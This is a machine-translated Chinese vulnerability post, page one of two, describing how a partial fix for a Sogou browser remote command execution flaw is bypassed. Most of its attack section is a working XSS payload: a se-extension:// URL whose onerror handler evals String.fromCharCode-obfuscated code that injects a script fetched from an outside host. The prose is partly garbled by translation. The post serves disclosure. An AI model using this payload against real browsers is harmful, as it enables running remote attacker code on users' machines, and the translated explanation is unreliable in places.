Palliative: the sogou browser to continue the remote execution of arbitrary commands-bug warning-the black bar safety net

2015-02-20T00:00:00
ID MYHACK58:62201559245
Type myhack58
Reporter 佚名
Modified 2015-02-20T00:00:00

Description

1. Update to the latest version

! 1.jpg

2. Search for a vulnerability, do some repair, the most fundamental Protocol of the jump limit is still not repaired.

A. for signin. htmlXSSdo as shown below fix:

! 2.jpg

Canonical seemingly written by a bunch of, very complex, but in reality: even defining the beginning of the ^ fall off,

Direct javascript:alert(1);//http://www.baidu.com/ bypassing the canonical.

B. when the top URL is not se-extension://, the extended API call is limited, but the current URL for the se-extension://, you can still call the extension API.

Therefore, while we cannot use an iframe to embed the call, but the combination of

location. href and window. open, you can still execute the command, the code is as follows:

First of all location. href to jump to signin. htmlXSSpage:

code area

location. href='se-extension://ext-1 0 5 5 8 3 4 3 1 8/signin. html? app=test&code=javascript:document. write("<img src%3D1 onerror%3Deval(String. fromCharCode(119,105,110,100,111,119,46,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,119,105,110,100,111,119,46,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,53,56,44,52,55,44,52,55,44,49,50,48,44,49,49,53,44,49,49,53,44,49,49,54,44,52,54,44,49,49,53,44,49,48,53,44,49,49,48,44,57,55,44,57,55,44,49,49,50,44,49,49,50,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,50,44,49,49,49,44,57,57,44,52,55,44,49,49,53,44,49,49,49,44,49,48,51,44,49,49,49,44,49,49,55,44,52,54,44,49,48,54,44,49,49,53,41,43,34,63,34,43,77,97,116,104,46,114,97,110,100,111,109,40,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,119,105,110,100,111,119,46,115,41))>");//http://www.baidu.com/';

ExecutingXSS

[1] [2] next